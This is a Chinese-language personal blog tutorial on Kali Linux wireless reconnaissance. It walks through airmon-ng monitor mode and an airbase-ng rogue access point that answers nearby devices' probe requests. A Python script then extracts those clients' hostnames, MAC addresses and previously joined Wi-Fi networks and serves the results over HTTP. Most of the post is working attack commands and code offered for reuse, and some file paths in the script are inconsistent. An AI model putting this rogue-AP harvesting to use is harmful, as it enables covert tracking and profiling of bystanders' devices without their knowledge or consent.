初见Kali,就觉得很不一般,于是摸索起来,终于有所领悟。
------Kali Linux无线渗透之主机名、MAC与wifi信息获取------
开启kali,打开终端,键入 ifconfig -a查看网卡信息。
键入命令: ifconfig wlan0 up #激活wlan0网卡
airmon-ng check kill #杀死影响进程
airmon-ng start wlan0 #将wlan0置为监听模式
airbase-ng -P -C 30 -v wlan0mon | tee wifi1.txt| #软件虚拟AP,伪造虚假响应包(Probe Response)来回应STA(Wireless station,手机、平板等客户端等)的探测(Probe Request),并将结果保存在wifi1.txt文件中。
运行python脚本,生成两个文件Host.json和Mac.json查看STA的的主机名和mac以及曾经连过的wifi
到此,本次任务完成。(喜欢文章 请点击右上方“+关注”)
python脚本如下:
import SimpleHTTPServer
import SocketServer
import threading
import os
import json
from time import sleep
class back(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def cmd(self,c):
c=os.popen(c).read()
return c
def run(self):
while True:
cmd_=self.cmd("cat /var/wifi1.txt |grep -|awk -F 'from ' '{print$2}'|sort |uniq ").replace('"','').split('\n')
nohup=''
self.cmd("echo > /wifi1.txt ")
x=0
for i in cmd_:
j=' "%d":"%s",' %(x,i)
nohup+= j
x+=1
nohup='{%s}'%nohup[:len(nohup)-1]
cmd_h=self.cmd("cat /var/lib/dhcp/dhcpd.leases|grep host|awk '{print$2}' ").replace('"','').split('\n')
x=0
dhcp=''
for i in cmd_h:
j=' "%d":"%s",' %(x,i)
dhcp+= j
x+=1
dhcp='{%s}'%dhcp[:len(dhcp)-1]
open('Host.json','w').write(dhcp)
open('Mac.json','w').write(nohup)
print dhcp,nohup
print "reading .."
sleep(30)
back().start()
PORT = 8009
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()
所学所得,步步维艰,分享知识,尊重原创,转载请注明出处。------Root_Yang